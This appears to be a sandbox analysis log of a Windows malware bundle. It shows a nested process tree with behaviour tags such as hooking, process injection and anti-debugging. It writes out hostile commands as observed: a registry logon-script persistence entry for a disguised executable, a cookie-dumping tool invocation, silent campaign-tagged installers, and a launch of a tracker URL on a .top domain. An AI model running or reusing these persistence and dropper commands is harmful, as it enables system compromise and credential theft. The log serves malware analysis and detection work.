C:\Users\Admin\AppData\Local\Temp\7b-7d035-e0f-364ac-b11b18ba9d24c\Behynomaeri.exe"C:\Users\Admin\AppData\Local\Temp\7b-7d035-e0f-364ac-b11b18ba9d24c\Behynomaeri.exe"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y3llzzkr.rk1\GcleanerEU.exe /eufive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\y3llzzkr.rk1\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\y3llzzkr.rk1\GcleanerEU.exe /eufive11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6800 -s 27612⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\12bsxfjm.pid\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\12bsxfjm.pid\installer.exeC:\Users\Admin\AppData\Local\Temp\12bsxfjm.pid\installer.exe /qn CAMPAIGN="654"11⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\12bsxfjm.pid\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\12bsxfjm.pid\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629272556 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lu0sqk1i.md0\ufgaa.exe & exit10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hvtgbd03.og5\anyname.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\hvtgbd03.og5\anyname.exeC:\Users\Admin\AppData\Local\Temp\hvtgbd03.og5\anyname.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\hvtgbd03.og5\anyname.exe"C:\Users\Admin\AppData\Local\Temp\hvtgbd03.og5\anyname.exe" -q12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rvhf5rlb.fwu\gcleaner.exe /mixfive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\rvhf5rlb.fwu\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\rvhf5rlb.fwu\gcleaner.exe /mixfive11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6456 -s 28012⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jo03uqwd.5em\autosubplayer.exe /S & exit10⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\8324748.exe"C:\Users\Admin\AppData\Roaming\8324748.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5880 -s 23408⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\6798012.exe"C:\Users\Admin\AppData\Roaming\6798012.exe"7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\4957603.exe"C:\Users\Admin\AppData\Roaming\4957603.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\8473479.exe"C:\Users\Admin\AppData\Roaming\8473479.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\tmp9432_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp9432_tmp.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
[depth 8] C:\Windows\SysWOW64\dllhost.exe
  "C:\Windows\System32\dllhost.exe"

[depth 8] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks

[depth 9] C:\Windows\SysWOW64\cmd.exe
  cmd

[depth 10] C:\Windows\SysWOW64\findstr.exe
  findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks

[depth 10] C:\Windows\SysWOW64\PING.EXE
  ping YJTUIPJF -n 30
  - Runs ping.exe

[depth 10] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  Esplorarne.exe.com i
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx

[depth 11] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx

[depth 12] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 13] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 14] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 15] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 16] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 17] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 18] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 19] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

[depth 20] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 21] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

[depth 22] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 23] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
  - Checks processor information in registry
  - Enumerates system info in registry

[depth 24] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 25] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 26] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 27] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 28] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

[depth 29] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 30] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 31] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
  - Checks processor information in registry
  - Enumerates system info in registry

[depth 32] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 33] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 34] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 35] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i

[depth 36] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
[depth 6] C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
  "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx

[depth 7] C:\Users\Admin\Documents\6lBjuoNz0e6Or5kVN9o2FWEh.exe
  "C:\Users\Admin\Documents\6lBjuoNz0e6Or5kVN9o2FWEh.exe"

[depth 7] C:\Users\Admin\Documents\9VfyAu5Y5h33aHpqD2aHew95.exe
  "C:\Users\Admin\Documents\9VfyAu5Y5h33aHpqD2aHew95.exe"
  - Suspicious use of SetThreadContext

[depth 8] C:\Users\Admin\Documents\9VfyAu5Y5h33aHpqD2aHew95.exe
  C:\Users\Admin\Documents\9VfyAu5Y5h33aHpqD2aHew95.exe

[depth 7] C:\Users\Admin\Documents\pCuweAs8rFE1CgxW49f5aXKk.exe
  "C:\Users\Admin\Documents\pCuweAs8rFE1CgxW49f5aXKk.exe"
  - Suspicious use of SetWindowsHookEx

[depth 8] C:\Users\Admin\Documents\pCuweAs8rFE1CgxW49f5aXKk.exe
  "C:\Users\Admin\Documents\pCuweAs8rFE1CgxW49f5aXKk.exe" -q
  - Suspicious use of SetWindowsHookEx

[depth 7] C:\Users\Admin\Documents\0bM853sXZJfrnu2mWSAOETVc.exe
  "C:\Users\Admin\Documents\0bM853sXZJfrnu2mWSAOETVc.exe"
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 8] C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx

[depth 7] C:\Users\Admin\Documents\WchvfjN_dzKFtUxFm7qRXxfF.exe
  "C:\Users\Admin\Documents\WchvfjN_dzKFtUxFm7qRXxfF.exe"
  - Suspicious use of SetWindowsHookEx

[depth 8] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 316
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

[depth 7] C:\Users\Admin\Documents\rQWlsYju61VFwsMGUM6zDgsi.exe
  "C:\Users\Admin\Documents\rQWlsYju61VFwsMGUM6zDgsi.exe"

[depth 8] C:\Users\Admin\Documents\rQWlsYju61VFwsMGUM6zDgsi.exe
  C:\Users\Admin\Documents\rQWlsYju61VFwsMGUM6zDgsi.exe

[depth 7] C:\Users\Admin\Documents\6EAqljiltiWS3f7r6sB61_sQ.exe
  "C:\Users\Admin\Documents\6EAqljiltiWS3f7r6sB61_sQ.exe"

[depth 7] C:\Users\Admin\Documents\t32Ur7ILpInlYyJRLs12SnLx.exe
  "C:\Users\Admin\Documents\t32Ur7ILpInlYyJRLs12SnLx.exe"
  - Suspicious use of SetWindowsHookEx

[depth 8] C:\Users\Admin\AppData\Local\Temp\is-KFD23.tmp\t32Ur7ILpInlYyJRLs12SnLx.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-KFD23.tmp\t32Ur7ILpInlYyJRLs12SnLx.tmp" /SL5="$1044E,138429,56832,C:\Users\Admin\Documents\t32Ur7ILpInlYyJRLs12SnLx.exe"
  - Loads dropped DLL
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx

[depth 9] C:\Users\Admin\AppData\Local\Temp\is-AFU84.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-AFU84.tmp\Setup.exe" /Verysilent
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Suspicious use of SetWindowsHookEx

[depth 10] C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
  "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
  - Loads dropped DLL
  - Enumerates connected drives
  - Modifies system certificate store

[depth 11] C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629272556 /qn CAMPAIGN=""710"" " CAMPAIGN="710"

[depth 7] C:\Users\Admin\Documents\asMNUD7Whzsx89sAGP_aLokg.exe
  "C:\Users\Admin\Documents\asMNUD7Whzsx89sAGP_aLokg.exe"
  - Suspicious use of SetWindowsHookEx

[depth 8] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6492 -s 292
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

[depth 7] C:\Users\Admin\Documents\DeHSDgDwlyn6MuTw6HCcYCrn.exe
  "C:\Users\Admin\Documents\DeHSDgDwlyn6MuTw6HCcYCrn.exe"
  - Suspicious use of SetThreadContext

[depth 8] C:\Users\Admin\Documents\DeHSDgDwlyn6MuTw6HCcYCrn.exe
  C:\Users\Admin\Documents\DeHSDgDwlyn6MuTw6HCcYCrn.exe

[depth 8] C:\Users\Admin\Documents\DeHSDgDwlyn6MuTw6HCcYCrn.exe
  C:\Users\Admin\Documents\DeHSDgDwlyn6MuTw6HCcYCrn.exe

[depth 7] C:\Users\Admin\Documents\0_7TlO6M5acqX4EPsCCuuuIA.exe
  "C:\Users\Admin\Documents\0_7TlO6M5acqX4EPsCCuuuIA.exe"

[depth 8] C:\Users\Admin\AppData\Roaming\5999348.exe
  "C:\Users\Admin\AppData\Roaming\5999348.exe"

[depth 9] C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 5212 -s 2292
  - Program crash

[depth 8] C:\Users\Admin\AppData\Roaming\4116312.exe
  "C:\Users\Admin\AppData\Roaming\4116312.exe"
  - Suspicious behavior: SetClipboardViewer

[depth 7] C:\Users\Admin\Documents\7vrT3uOZl1qmiSYlZrNbnZUH.exe
  "C:\Users\Admin\Documents\7vrT3uOZl1qmiSYlZrNbnZUH.exe"
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 7] C:\Users\Admin\Documents\NwFGfQ4gWNhniyDRsfbdyZxN.exe
  "C:\Users\Admin\Documents\NwFGfQ4gWNhniyDRsfbdyZxN.exe"
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 7] C:\Users\Admin\Documents\ewz7aGhr4LCktqJ0Uq05IHJx.exe
  "C:\Users\Admin\Documents\ewz7aGhr4LCktqJ0Uq05IHJx.exe"

[depth 8] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6392 -s 276
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

[depth 7] C:\Users\Admin\Documents\PSFJVLwun3TcfKuUSaxkpg3c.exe
  "C:\Users\Admin\Documents\PSFJVLwun3TcfKuUSaxkpg3c.exe"
  - Suspicious use of SetWindowsHookEx

[depth 7] C:\Users\Admin\Documents\5uJnm0wkHdqW1g5_jI555vTL.exe
  "C:\Users\Admin\Documents\5uJnm0wkHdqW1g5_jI555vTL.exe"
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 7] C:\Users\Admin\Documents\oV9K3dhV904F3H994tOBupei.exe
  "C:\Users\Admin\Documents\oV9K3dhV904F3H994tOBupei.exe"

[depth 7] C:\Users\Admin\Documents\bEQOSwZfLy35v67HMStZes1l.exe
  "C:\Users\Admin\Documents\bEQOSwZfLy35v67HMStZes1l.exe"
  - Suspicious use of SetWindowsHookEx

[depth 8] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 272
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

[depth 7] C:\Users\Admin\Documents\xLqNvme6hoDlPTgBHwIDSLik.exe
  "C:\Users\Admin\Documents\xLqNvme6hoDlPTgBHwIDSLik.exe"

[depth 8] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 280
  - Program crash
[depth 6] C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
  "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

[depth 7] C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
  "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
  - Suspicious use of SetWindowsHookEx

[depth 3] C:\Users\Admin\Documents\n5iK85pyxBdO3WOr6bRNQ6xx.exe
  "C:\Users\Admin\Documents\n5iK85pyxBdO3WOr6bRNQ6xx.exe"
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

[depth 4] C:\Users\Admin\Documents\n5iK85pyxBdO3WOr6bRNQ6xx.exe
  "C:\Users\Admin\Documents\n5iK85pyxBdO3WOr6bRNQ6xx.exe" -q
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

[depth 5] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4844 -s 984
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses

[depth 2] C:\Users\Admin\AppData\Local\Temp\pub2.exe
  "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
  - Executes dropped EXE

[depth 3] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 276
  - Drops file in Windows directory
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

[depth 2] C:\Users\Admin\AppData\Local\Temp\Install.exe
  "C:\Users\Admin\AppData\Local\Temp\Install.exe"
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken

[depth 3] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 1636
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses

[depth 2] C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
  "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of AdjustPrivilegeToken

[depth 2] C:\Users\Admin\AppData\Local\Temp\jamesold.exe
  "C:\Users\Admin\AppData\Local\Temp\jamesold.exe"
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage

[depth 2] C:\Users\Admin\AppData\Local\Temp\Files.exe
  "C:\Users\Admin\AppData\Local\Temp\Files.exe"
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory

[depth 3] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  - Executes dropped EXE

[depth 3] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses

[depth 3] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[depth 3] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
[depth 1] C:\Windows\System32\sihclient.exe
  C:\Windows\System32\sihclient.exe /cv yKasnM7UgUqICmWI3CBItg.0.2
  - Modifies data under HKEY_USERS

[depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 860 -ip 860
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Suspicious use of WriteProcessMemory

[depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3792 -ip 3792
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Suspicious use of WriteProcessMemory

[depth 1] C:\Windows\system32\rUNdlL32.eXe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory

[depth 2] C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  - Loads dropped DLL

[depth 3] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 456
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses

[depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2288 -ip 2288
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Suspicious use of WriteProcessMemory

[depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 744 -ip 744
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Suspicious use of WriteProcessMemory

[depth 1] C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
  - Modifies data under HKEY_USERS

[depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3636 -ip 3636
  - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3904 -ip 3904
  - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

[depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5080 -ip 5080
  - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4844 -ip 4844
[depth 1] C:\Users\Admin\AppData\Local\Temp\is-VK655.tmp\Inlog.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-VK655.tmp\Inlog.tmp" /SL5="$302DE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx

[depth 2] C:\Users\Admin\AppData\Local\Temp\is-80MOG.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-80MOG.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
  - Suspicious use of SetWindowsHookEx

[depth 3] C:\Users\Admin\AppData\Local\Temp\is-QSNKH.tmp\Setup.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-QSNKH.tmp\Setup.tmp" /SL5="$50256,17369384,721408,C:\Users\Admin\AppData\Local\Temp\is-80MOG.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx

[depth 4] C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-GQ7IO.tmp\{app}\microsoft.cab -F:* %ProgramData%
  - Suspicious use of SetThreadContext

[depth 5] C:\Windows\SysWOW64\expand.exe
  expand C:\Users\Admin\AppData\Local\Temp\is-GQ7IO.tmp\{app}\microsoft.cab -F:* C:\ProgramData
  - Drops file in Windows directory

[depth 4] C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f

[depth 5] C:\Windows\SysWOW64\reg.exe
  reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f

[depth 4] C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721

[depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449&param=721
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x120,0x124,0x128,0x11c,0xd4,0x7ffb4adc46f8,0x7ffb4adc4708,0x7ffb4adc47186⤵
-
